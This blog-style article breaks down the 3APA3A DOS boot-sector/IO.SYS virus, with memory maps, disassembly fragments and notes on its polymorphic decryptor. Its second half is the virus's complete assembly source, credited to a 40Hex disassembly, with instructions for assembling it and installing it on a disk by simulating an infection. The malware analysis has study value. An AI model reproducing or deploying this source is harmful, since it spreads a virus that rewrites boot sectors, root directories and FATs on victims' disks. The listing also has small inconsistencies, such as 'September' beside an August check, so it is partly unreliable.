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VW1: The Breakdown of 3APA3A Virus

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Published in 
 · 2 years ago

The 3aPa3a virus originated in Russia. It is know for the unusal way it infects it's victims. That's right "victims". This virus infects the .sys.

This is the breakdown of the virus. I hope you can learn from it.

Figure 1. Map of memory usage of 3APA3A virus, when the virus boot sector is infecting the hard drive.

Address        Size      Function (buffer for) 
7C00:0000 200h Hard drive boot sector
7C00:0200 2 AX for INT_13 (0201h, 0301h, etc.)
7C00:0202 1 DH for INT_13 (usually 80h)
7C00:0203 200h FAT end
7C00:0403 A00h HDD Root directory, 5 sectors only!
7C00:0E03 200h FAT start
7C00:1003 2000h 1 cluster of original IO.SYS (*)
7C00:3003 2000h 2 cluster
7C00:5003 2000h 3 cluster
7C00:7003 2000h 4 cluster
7C00:9003 2000h 5 cluster
7C00:B003 2000h 6 cluster
... ... ...
7C00:xx03 2000h last IO.SYS cluster

(*) Cluster size was taken 8192 bytes (16 sectors) only for example. It may be different according to sectors/cluster ratio.

Figure 2. Sizes of DOS system files for different versions (in bytes).

1.00 PC 2047 6400 4959
2.00 PC 4907 17411 18160
3.00 PC 8964 27920 22042
3.30 MS 22357 30128 25276
4.00 PC 32810 35984 37637
4.01 MS 33337 37376 37557
5.00 MS 33430 37394 47845
6.20 MS 40566 38138 54500

Figure 3. Virus code fragment, which checks whether partition uses 16 bit FAT or not.

7C75 A11300      MOV     AX,[0013]    ;total sectors in media on HDD 
7C78 48 DEC AX ;0000 -> FFFF (for big disks!)
7C79 3D0351 CMP AX,5103 ;16 bit FAT guaranteed!
7C7C 76B1 JBE 7C2F ;pass control to floppy boot

Figure 4. Modification of the root directory of first DOS partition by 3APA3A virus: a) initial layout, b) after first shift c) after copying of IO.SYS entry to 3rd position.

    -------------  -------------  ------------- 
#1 IO.SYS IO.SYS IO.SYS -> infected IO.SYS
------------- ------------- -------------
------------- ------------- -------------
#3 FILE0003.EXT FILE0003.EXT IO.SYS -> copy of IO.SYS
------------- ------------- -------------
------------- ------------- -------------
------------- ------------- -------------
#79 FILE0079.EXT FILE0078.EXT FILE0078.EXT
------------- ------------- -------------
#80 FILE0080.EXT FILE0079.EXT FILE0079.EXT
------------- ------------- -------------

a) b) c)

Figure 5. The decryptor of virus floppy boot sector is polymorphic. A caret "^" symbol designates variable bytes. Number in brackets corresponds to a comment below.

7C1E BE2C7C        MOV     SI,7C2C      ;starting address 
^^^^ (1)
7C21 2E CS: ;infection marker! (1 byte of 2)
7C22 800470 ADD BYTE PTR [SI],70
^^^^^^ (2)
7C25 46 INC SI
^^ (3)
7C26 81FEFB7D CMP SI,7DFB ;upper limit ?
^^^^ (4)
7C2A 75F5 JNZ 7C21 ;<- JNZ offset may be encrypted
^^ (5)
7C2C ...

  1. These two bytes are variable and may be: 2BBE, 2CBE, 2DBE or 2EBF. Makes: MOV SI, 7C2B; MOV SI, 7C2C; MOV SI, 7C2D; MOV DI, 7C2E. Thus, start of encryption at address: 7C2B, 7C2C, 7C2D, 7C2E (with equal probability).
  2. These three bytes are variable:
    • F61490 or F61590 NOT BYTE PTR [SI] ;or [DI] (3rd byte is 90h)
    • 8004xx or 8005xx ADD BYTE PTR [SI],xx ;or [DI] (3rd byte xx=RND)
    • 802Cxx or 802Dxx SUB BYTE PTR [SI],xx ;or [DI] (3rd byte xx=RND)
    • 8034xx or 8035xx XOR BYTE PTR [SI],xx ;or [DI] (3rd byte xx=RND)

  3. This byte may be 46 (INC SI, 75% probability) or 47 (INC DI, 25% probability)
  4. These two bytes are variable: FAFE, FBFE, FCFE or FDFF. Makes: CMP SI,7DFA; CMP SI,7DFB; CMP SI,7DFE; CMP DI,7DFD)
  5. This byte may be encrypted (probability=25%)! And the virus will hang on 386, 486 because of processor queue pre-fetch.

Figure 6. Global structure of the virus IO_sector.

0000:7C00      PUSH CS             ;places startCS on stack 
CALL $+3
POP SI ;gets relative position in CS
SUB SI,4 ;sizeof(PUSH+CALL)
PUSH SI ;places it on stack
;(startCS:SI=0000:7C00 is on stack)
| viral code |
| copy virus |
| code to |
| ES=9F80 |
PUSH AX ;(9F80:006C is on stack now)
RETF ;same as JMP 9F80:006C

9F80:006C ---------------------
| read 2 sectors |
| from original |
| IO.SYS to |
| 0000:7C00 | ;read 1k to startCS:SI=0000:7C00
| ... |
RETF ;same as JMP 0000:7C00

Figure 7. Map of memory usage of 3APA3A virus, when it is resident in
computer memory (CS=9F80 and the virus sets DS=ES=9FA0).

Address (same as) Size Function
CS:offset DS:offset (bytes) (buffer for)
9F80:0000 200h IO_sector
9F80:0200 9FA0:0000 200h Virus boot sector
(used for encryption)
9F80:0400 9FA0:0200 2 0201/0301 (AX for INT_13)
9F80:0402 9FA0:0202 1 0/1 (DL for INT_13)
9F80:041E 9FA0:021E 1E2h Virus boot sector code (orig. copy)
9F80:0600 9FA0:0400 200h Current floppy boot sector

(*) Code segment CS=9F80 was taken for example. That is a location of the virus for normal 640k computer (CS=A000-2k).

Figure 8. "Window leaf" in the interrupt 13h function of virus. Leaf is "closed" at address 00BC and is opened at 00C4.

00B4 A10002      MOV     AX,[0200]    ;may be read and write 
00B7 8A160202 MOV DL,[0202] ;drive # (0/80)
00BB 2E CS:
00BC C606E300EB MOV BYTE PTR [00E3],EB ;-> JMP ("close leaf")
00C1 CD13 INT 13
00C3 2E CS:
00C4 C606E30075 MOV BYTE PTR [00E3],75 ;-> JNZ ("open leaf")
00C9 7202 JB 00CD
; virus INT_13 handler (usually at 9F80:00D5)
00D5 50 PUSH AX
00D6 53 PUSH BX
00D7 51 PUSH CX
00D8 52 PUSH DX
00D9 56 PUSH SI
00E0 F6C280 TEST DL,80 ;HDD (1st or 2nd)?
00E3 EBED JMP 00D2 ;<- see 00C4 & 00BC (set JNZ/JMP)
;here if not HDD
00E5 02F1 ADD DH,CL
00E7 02F5 ADD DH,CH
00E9 80FE01 CMP DH,01 ;DH=CH+CL+DH=1 if boot sector
00EC 77E4 JA 00D2 ;exit from handler

Figure 9. The virus code fragment, which prints the message "B BOOT CEKTOPE - 3APA3A! <BELL> <0Dh> <10h>"

000F B404        MOV     AH,04          ;get CMOS date 
0011 CD1A INT 1A
0013 80FE08 CMP DH,08 ;August?
0016 7512 JNZ 002A
0018 8D9C9A00 LEA BX,[SI+009A] ;pointer on message
001C B8420E MOV AX,0E42 ;tty output, ASCII(42)='B'
001F B91A00 MOV CX,001A ;length
0022 CD10 INT 10
0024 2E CS:
0025 0207 ADD AL,[BX] ;sum all prev. chars in AL
0027 43 INC BX ;increase pointer
0028 E2F8 LOOP 0022


009A DE220D0005CC2302 ;this table stores values,
00A2 0609FB01F5DB0DF3 ;which being added to previous char
00AA 130E0FF1F20EE0E6 ;gives new one (smth. like "delta"-coding)
00B2 0603 ;last char has an error - 10h instead of LF
; To assemble, simple run TASM and TLINK on this file and generate a binary.
; The first 512d bytes of the binary will contain the portion of the virus
; which resides in IO.SYS. The second 512d bytes will contain the boot
; section portion of the virus.

; Installation is slightly more difficult. It requires you to simulate
; an infection with 3apa3a. Read the text above for information. Basically,
; you have to fill in the BPB in the boot sector, fill in the patch values,
; and then move the pieces onto the disk properly.

.model tiny
.radix 16
org 0
; 3apa3a virus
; Disassembly by Dark Angel of Phalcon/Skism for 40Hex Issue 14
_3apa3a: push cs
call doffset
doffset: pop si
db 83,0EE,4 ; sub si,4
push si ax bx cx dx ds es

mov ah,4 ; get date
int 1Ah

cmp dh,8 ; september?
jne no_activate

lea bx,cs:[si+message-_3apa3a]
mov ax,0E42 ; begin with B
mov cx,endmessage - message
display_loop: int 10 ; print character
add al,cs:[bx] ; calculate next
inc bx
loop display_loop

no_activate: cld
xor ax,ax ; ds = 0
mov ds,ax
push cs ; es = cs
pop es
lea di,[si+offset old_i13]
push si
mov si,13*4 ; grab old int 13
mov ax,ds:413 ; get BIOS memory size
dec ax ; decrease by 2K
dec ax
mov ds:413,ax ; replace the value
mov cl,6 ; convert to paragraphs
shl ax,cl
mov [si-2],ax ; replace interrupt
mov word ptr [si-4],offset i13
mov es,ax ; move ourselves up
push cs
pop ds si
xor di,di
mov cx,200
push si
rep movsw ; copy now!
inc ch ; cx = 1
sub si,200 ; copy rest
rep movsw
pop si
push cs es
mov ax,offset highentry
push ax

highentry: mov ax,7C0
mov ds,ax
mov word ptr ds:200,201
mov byte ptr ds:202,80
les ax,dword ptr cs:203
mov dx,es
pop es
mov bx,si
mov cx,1
mov word ptr cs:3C2,0FCF0 ; patch work_on_sectors
to call
call work_on_sectors ; do_i13
pop es ds dx cx bx ax

message: db ' ' - 'B'
db 'B' - ' '
db 'O' - 'B'
db 'O' - 'O'
db 'T' - 'O'
db ' ' - 'T'
db 'C' - ' '
db 'E' - 'C'
db 'K' - 'E'
db 'T' - 'K'
db 'O' - 'T'
db 'P' - 'O'
db 'E' - 'P'
db ' ' - 'E'
db '-' - ' '
db ' ' - '-'
db '3' - ' '
db 'A' - '3'
db 'P' - 'A'
db 'A' - 'P'
db '3' - 'A'
db 'A' - '3'
db '!' - 'A'
db 7 - '!'
db 0Dh - 7
db 10 - 0Dh

do_i13: mov ax,ds:200
mov dl,ds:202
mov byte ptr cs:patch,0EBh ; jmp absolute
int 13 ; do interrupt
mov byte ptr cs:patch,75 ; jnz
jc retry_error

retry_error: cmp dl,80 ; first hard drive?
je do_i13 ; if so, retry
go_exit_i13: jmp exit_i13 ; otherwise quit

i13: push ax bx cx dx si di ds es bp
mov bp,sp
test dl,80 ; hard drive?
patch: jnz go_exit_i13

add dh,cl ; check if working on
add dh,ch ; boot sector or
cmp dh,1 ; partition table
ja go_exit_i13 ; if not, quit

mov ax,cs ; get our current
add ax,20 ; move up 200 bytes
mov ds,ax
mov es,ax
mov word ptr ds:200,201 ; set function to read
mov ds:202,dl ; set drive to hard
mov bx,400 ; set buffer
xor dx,dx ; read in the boot
push dx
mov cx,1
call do_i13 ; read in boot sector

cmp byte ptr ds:400+21,2E ; check if 3apa3a
already there
je go_exit_i13
cmp byte ptr ds:400+18,0
je go_exit_i13

push cs
pop es
mov di,203
mov si,403
mov cx,1Bh ; copy disk tables
rep movsb

sub si,200 ; copy the rest
mov cx,1E2
rep movsb

inc byte ptr ds:201 ; set to write
mov ax,ds:16 ; get sectors per FAT
mul byte ptr ds:10 ; multiply by # FATs
mov bx,ds:11 ; get number of sectors
mov cl,4 ; occupied by the root
shr bx,cl ; directory
db 83,0FBh,5 ; cmp bx,5 ; at least five?
jbe go_exit_i13 ; if not, quit

add ax,bx ;
add ax,ds:0E ; add # reserved sectors
dec ax ; drop two sectors to
dec ax ; start of last sector
xor dx,dx ; of root directory
push ax dx
call abs_sec_to_BIOS
mov ds:patch1-200,cx ; move original boot
mov ds:patch2-200,dh ; sector to the end of
xor bx,bx ; root directory
call do_i13
pop dx ax
dec ax
call abs_sec_to_BIOS

mov ds:34,cx ;patch3 ; write io portion to
mov ds:37,dh ;patch4
add bh,6 ; bx = 600
call do_i13

push ds
xor ax,ax
mov ds,ax
mov dx,ds:46C ; get timer ticks
pop ds

mov bl,dl ; eight possible
db 83,0E3,3 ; and bx,3
push bx
shl bx,1 ; convert to word index
mov si,bx
mov cx,es:[bx+encrypt_table]
pop bx
push bx
mov bh,bl
shr bl,1 ; bl decides which ptr
to use
lea ax,cs:[bx+2BBE] ; patch pointer
mov ds:[decrypt-bs_3apa3a],ax ; and start location
add ch,bl
mov ds:[encrypt_instr-bs_3apa3a],cx
add ax,0CF40
mov ds:[patch_endptr-bs_3apa3a],ax
pop ax
push ax
mul dh
add al,90 ; encode xchg ax,??
add bl,46 ; encode inc pointer
mov ah,bl
mov ds:[patch_incptr-bs_3apa3a],ax
mov dx,word ptr cs:[si+decrypt_table]
mov word ptr cs:decrypt_instr,dx
pop di
db 83,0C7 ;add di,XX ; start past decryptor
dw bs_3apa3a_decrypt - bs_3apa3a
org $ - 1
mov si,di
push ds
pop es
mov cx,end_crypt - bs_3apa3a_decrypt; bytes to crypt
mov ah,al
encrypt_loop: lodsb
decrypt_instr: add al,ah
loop encrypt_loop

pop dx
mov cx,1 ; write the replacement
xor bx,bx ; boot sector to the
call do_i13
exit_i13: mov sp,bp
pop bp es ds di si dx cx bx ax
db 0EAh
old_i13 dw 0, 0

decrypt_table: not al
sub al,ah
add al,ah
xor al,ah

encrypt_table dw 014F6 ; not
dw 0480 ; add
dw 2C80 ; sub
dw 3480 ; xor
; This marks the end of the IO.SYS only portion of 3apa3a

; The boot sector portion of 3apa3a follows.

adj_ofs = 7C00 + zero - bs_3apa3a

bs_3apa3a: jmp short decrypt
; The following is an invalid boot sector. Replace it
; yours.
db ' '

db 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00, 00, 00
db 00

decrypt: db 0BF ; mov di,
dw adj_ofs + bs_3apa3a_decrypt
decrypt_loop: db 2e ; cs:
encrypt_instr label word
db 80,2Dh ; sub byte ptr [di],XX
patch_incptr label word
db 0 ; temporary value for
inc di
db 81 ; cmp
patch_endptr label word
db 0ff ; pointer
dw adj_ofs + end_crypt
jne decrypt_loop
bs_3apa3a_decrypt = $ - 1
jmp short enter_bs_3apa3a

load_original: xor dx,dx ; set up the read
mov es,dx ; of the original boot
db 0B9 ; mov cx, XXXX
patch3 dw 3
db 0B6
patch4 db 1
mov bx,ds ; es:bx = 0:7C00
mov ax,201
db 0ebh ; jump to code in stack
dw bs_3apa3a - 4 - ($ + 1)

org $ - 1

xor ax,ax
mov ss,ax ; set stack to just
below us
mov sp,7C00
mov dl,80 ; reset hard drive
int 13

mov ax,2F72 ; encode JNZ
load_original at
; 7BFE
mov ds,sp ; set segment registers
mov es,sp ; 7C00
push ax
mov word ptr ds:200,201 ; do a read
mov ds:202,dl ; from the hard drive
xor bx,bx ; read to 7C00:0
mov dh,1 ; read head 1
mov cx,1 ; read sector 1
; (assumes active boot
; sector is here)
mov ax,13CDh ; encode int 13 at 7BFC
push ax
call exec_int13 ; do the read
mov bx,203
cmp byte ptr [bx-4],0AA ; is it valid bs?
jne load_original ; if not, assume
infected and
; transfer control to it
mov ax,ds:13 ; get number of sectors
dec ax ; image - 1
cmp ax,5103 ; hard drive too small?
jbe load_original ; sectors ~ 10.6 megs)
mov ax,ds:1C ; get number hidden
add ax,ds:0E ; add number reserved
mov ds:9,ax ; store at location that
; the end of OEM
add ax,ds:16 ; add sectors per FAT
dec ax ; go down two sectors
dec ax
push ax
xor dx,dx
mov cx,dx
call work_on_sectors ; load end of FAT to
mov ax,ds:16 ; get sectors per FAT
push ax ; save the value
mul byte ptr ds:10 ; multiply by # FATs
add ax,ds:9 ; calculate start of
root dir
mov ds:7,ax ; store it in work
mov cl,4
mov si,ds:11 ; get number sectors the
shr si,cl ; root directory takes
add si,ax ; and calculate start of
mov ds:5,si ; area and store it in
call work_on_sectors ; get first 5 sectors of
; root directory
test byte ptr ds:403+0Bh,8 ; volume label bit set
on first
; entry? (infection
jne_load_original: ; if so, already
infected, so
jnz jnz_load_original ; quit
xor si,si
mov bx,1003
mov ax,ds:403+1A ; get starting cluster
; of IO.SYS
read_IO_SYS: push ax ; convert cluster to
call clus_to_abs_sec ; sector number
call work_on_sector ; read in one cluster of
inc si
pop ax

push bx ax
mov bx,403+0A00 ; read into this buffer
push bx
mov al,ah ; find the sector with
the FAT
xor dx,dx ; entry corresponding to
mov ah,dl ; cluster
add ax,ds:9
call work_on_sectors ; read in the FAT
pop bx ax
mov ah,dl
shl ax,1
mov di,ax
mov ax,[bx+di] ; grab the FAT entry
(either EOF
; or next cluster
pop bx ; corresponding to this
cmp ax,0FFF0 ; is there any more to
jb read_IO_SYS ; if so, keep going

inc byte ptr ds:201 ; change function to a
pop cx
dec cx
dec cx
mov ds:4,cl
mov di,401 ; scan the end of the
mov cx,100
mov bp,-1
copy_IO_SYS: xor ax,ax ; look for unused
repne scasw
jnz jne_load_original
mov [di+2],bp
mov bx,cx
mov bh,ds:4
mov bp,bx ; save starting cluster
push bp cx ; where IO.SYS will be
mov ah,ds:0Dh
shl ax,1
dec si
mul si
mov bx,ax
add bx,1003
mov ax,bp
call clus_to_abs_sec
call work_on_sector ; move IO.SYS to end of
pop cx bp
or si,si
jnz copy_IO_SYS

mov si,0DE1 ; move all but the first
mov di,0E01 ; directory entries down
mov cx,4D0 ; (10 dir entries /
rep movsw ; 5 sectors)
; DF set by exec_int13
mov si,421 ; move IO.SYS entry down
mov cx,10 ; entries
rep movsw

mov ds:400+2*20+1Dh,bp ; set starting cluster
of the
; moved original IO.SYS
or byte ptr ds:40E,8 ; set volume label bit
on first
; IO.SYS entry
mov bx,403 ; point to root
mov ax,ds:7 ; get starting cluster
xor dx,dx ; root dir
mov cl,4
call work_on_sectors ; write updated root
pop ax ; to the disk
write_FATs: mov bx,203 ; point to the updated
call work_on_sectors ; write changed end of

dec ax
add ax,ds:16 ; add sectors per FAT
dec byte ptr ds:10 ; processed all the
jnz write_FATs

mov ax,bp
call clus_to_abs_sec
mov cs:7C03,ax ; store the values
mov cs:7C05,dx
mov byte ptr cs:7C01,1Ch

xor ax,ax ; reset default drive
mov dx,ax
int 13

mov ax,201 ; read in original boot
; You must patch the following values if you are installing 3apa3a on a disk
db 0b9 ; mov cx, XXXX
patch1 dw 0
db 0b6 ; mov dh, XX
patch2 db 0
mov bx,0E03
call perform_int13

mov ax,ds:403+1A ; get starting cluster
call clus_to_abs_sec ; of IO.SYS
xor cx,cx
call work_on_sectors
mov bx,ds
mov es,cx
call work_on_sectors
jmp load_original

exec_int13: mov ax,ds:200 ; get function from
mov dl,ds:202 ; get drive from memory
perform_int13: int 13
jc go_load_original

work_on_sectors:inc cx
work_on_sector: push cx dx ax
call abs_sec_to_BIOS
call exec_int13
pop ax dx cx
add ax,1 ; calculate next sector
db 83,0D2,0 ; adc dx,0 ; (don't use INC because
add bh,2 ; INC doesn't set carry)
loop work_on_sector ; do it for the next


abs_sec_to_BIOS:div word ptr ds:18 ; divide by sectors per
mov cx,dx
inc cl
xor dx,dx
div word ptr ds:1A ; divide by number of
ror ah,1
ror ah,1
xchg ah,al
add cx,ax
mov dh,dl

clus_to_abs_sec:mov cl,ds:0Dh ; get sectors per
xor ch,ch ; (convert to word)
dec ax
dec ax
mul cx ; convert cluster number
add ax,ds:5 ; absolute sector number
end_crypt: db 83,0D2,0 ; adc dx,0

dw 0AA55 ; boot signature

end _3apa3a

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